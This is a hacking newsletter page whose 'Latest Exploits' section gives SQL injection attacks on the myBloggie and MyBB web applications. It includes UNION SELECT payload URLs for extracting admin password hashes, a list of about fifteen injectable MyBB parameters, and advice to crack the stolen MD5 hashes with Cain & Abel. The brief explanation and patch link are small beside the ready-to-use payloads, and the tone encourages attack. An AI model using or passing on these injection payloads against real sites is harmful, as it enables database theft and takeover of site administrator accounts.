HBH Newsletter |
| | HBH News | | WebWars | | Hacking News | | Hacking Skills | | Newsletter Article | | Interview | | Latest Exploits | | Credits | |
|
Latest Exploits:
* myBloggie version 2.1.1
* myBloggie version 2.1.2
This is a php based webblog system, the new thing "you just gotta have".
www.example.com/mybloggie/index.php
mode=search&keyword=test'UNION SELECT * FROM test To get the admin hashes use this link;
www.example.com/index.php?month_no=1&year=1&mode=viewdate&date_no= Now that you have the hashes you can start cracking it, cain& abel is a good program for cracking md5 hashes, also the most know for it. this can be found at: http://www.oxid.it/cain.html So how did it work: Well basically when you do the month_no=1&year=1&mode=viewdate&date_no=1 it goes to the sql database and get's the info stored in the variables month_no and year out of the db. This is done through sql commands, now due to bad checking of the inputted text you are able to input sql commands to ask the database what you want and hey, everyone knows when you ask something nicely you always get what you want :p
/$\ source: security focus /$\
Vurnable Systems:
Well a second exploit works on the same principle as the one above. Basically because of a lack of user input checking in some variables a user is granted to ask the db nifty sql questions :) www.example.com/myBB/ {it could be named anything instead of the myBB folder, but that's the default from installation}Then the first thing we can do is go to the calendar.php page and there's where we ask the db for the password hash by doing this:
www.example.com/myBB/calendar.php?action=event&eid='%20UNION%20SELECT if the exploit didn't work it could be because of the settings of the sql database so luckily for us there are still a lot of variables exploitable :) http://www.example.com/mybb/online.php?pidsql=)[sql_query] http://www.example.com/mybb/memberlist.php?usersearch=%'[sql_query] http://www.example.com/mybb/editpost.php?pid='[sql_query] http://www.example.com/mybb/forumdisplay.php?fid='[sql_query] http://www.example.com/mybb/newreply.php?tid='[sql_query] http://www.example.com/mybb/search.php?action=results&sid='[sql_query] http://www.example.com/mybb/showthread.php?tid='[sql_query] http://www.example.com/mybb/showthread.php?pid='[sql_query] http://www.example.com/mybb/usercp2.php?tid='[sql_query] http://www.example.com/mybb/printthread.php?tid='[sql_query] http://www.example.com/mybb/reputation.php?pid='[sql_query] http://www.example.com/mybb/portal.php?action=do_login&username='[sql_query] http://www.example.com/mybb/polls.php?action=newpoll&tid='[sql_query] http://www.example.com/mybb/ratethread.php?tid='[sql_query] /$\source: http://www.securityalertz.com/Article907.html /$\
how to solve this : http://www.mybboard.com/community/showthread.php?tid=2559 //security patch
Don't sit still, do the thing you love the most, but do it with style and honour :D
Any comments, fanmail, hatemail, suggestions, help, you know how to find me.
[$]Anarcho-Hippie[$] |
Html Format by Anarcho-Hippie - HBHNewsletter 01 |